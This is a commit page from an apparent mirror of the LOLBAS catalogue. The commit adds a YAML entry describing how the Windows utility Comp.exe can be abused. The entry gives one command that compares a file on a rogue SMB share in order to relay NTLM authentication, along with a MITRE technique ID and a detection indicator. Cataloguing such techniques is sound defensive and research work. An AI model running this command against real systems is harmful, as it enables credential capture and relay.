public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-27 07:18:05 +01:00
Code Issues Projects Releases Wiki Activity

Update Comp.yml

Browse Source
This commit is contained in:
Kousha Zanjani 2024-02-13 13:38:06 +03:30 committed by GitHub
parent a78e066441
commit d61d79b7c5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 25 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
yml/OSBinaries/Comp.yml
View File

@ -1 +1,25 @@
---
Name: Comp.exe
Description: Used to compares the contents of two files or sets of files byte-by-byte
Author: 'Kousha Zanjani'
Created: 2024-02-13
Commands:
- Command: comp /M \\10.0.0.10\ fake.txt
Description: Tries to compare a file from rogue SMB Share with a fake.txt file
Usecase: Relay a NTLM authentication
Category: Credentials
Privileges: User
MitreID: T1187
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\comp.exe
- Path: C:\Windows\SysWOW64\comp.exe
Code_Sample:
- Code:
Detection:
- IOC: comp.exe retrieving files from remote server
Resources:
- Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/comp
Acknowledgement:
- Person: Kousha Zanjani
Handle: